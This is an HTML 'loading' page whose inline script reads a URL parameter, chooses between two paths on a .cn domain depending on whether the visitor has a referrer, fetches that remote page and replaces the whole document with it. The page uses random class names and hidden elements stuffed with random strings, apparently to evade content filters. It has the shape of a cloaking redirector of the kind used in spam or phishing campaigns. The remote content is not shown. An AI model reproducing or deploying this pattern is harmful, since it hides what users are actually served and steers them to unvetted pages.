<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PGIAXKv {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PGIAXKv .UcXEDpRXT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PGIAXKv .content {
            line-height: 50px;
            text-align: center
        }

        .PGIAXKv .img {
            width: 100%
        }

        .PGIAXKv .tqhk6s9nmYI {
            text-align: center
        }

        .PGIAXKv .tqhk6s9nmYI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PGIAXKv .tqhk6s9nmYI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PGIAXKv .tqhk6s9nmYI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PGIAXKv .tqhk6s9nmYI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PGIAXKv .tqhk6s9nmYI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PGIAXKv .tqhk6s9nmYI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PGIAXKv .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yaXxih6ppiVPt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var edCqCa = yaXxih6ppiVPt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ edCqCa +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ edCqCa +".html?a=share";
		}
		
        nmEpobow1=url+"#"+new Date().getTime();
        nmEpobow1 && function() {
            $.get(nmEpobow1, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>WXXNhelUWSHpl33LGDfTmkjYqxtGLsBMCi1cvuO5ElU4wVR5SDjqFJpzXtIA2j4YNm</span>
<a  href='#' style='display:none'>tPJyHYl22cXjZsBus2wmDdsheTsDtJu8vq</a>
<img  src='' style='display:none'>
<h1 style='display:none' >j7KUEz4kkuRhcvrCR3dP7kC3AMekc0BvJoS2YHxmWvXwtFkd80XG9c8lMgb4CghWY7HOP6m9rfG5XfQEQHDVdiSHI1OM8gQ</h1><div class="PGIAXKv">
    <div class="UcXEDpRXT">
        <div class="tqhk6s9nmYI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>yEOOTUYd4hN26hjAVHkgJestduZTu2ycMUithlsYYNMT1ak37dbqs4EbZ4RZAKs1c0AUPbs95AqG5CXdD5x</a>
<li style='display:none' >V8PTYYIs11rkhqPxgl1bhFX9zuufBxH0K7DYrxQUxC06tQF13NOYWF8ejUoDnsQFR89YNoSYhVHoiVn08OkykkNrg4TyHO1</li>
<ul style='display:none' >cUjVFO1fiIauWsRQTtZpPiIU1bsZfH9Ta6t3OZdqpSny1m3BEC8SQhFve3nVEJFtBWiUxeHMh0pD2zaaxb</ul>
<div style='display:none'>U5jpy0koz416t4wMmBkSOwVjaCIn7wVnBdNM2DQgNhKgTTFhhAy4K4mR5LkGIiYPkxyALJjDp8snVNQffbb</div>
<h1 style='display:none' >AGC3cuwi4FLl9zRFBxm8SkbmsNZIHkwmnBx3mgcSO7gOreF1ziE5RihaIKSaXZnCnXVTfn4etxvoUyKKEan</h1></body>
</html>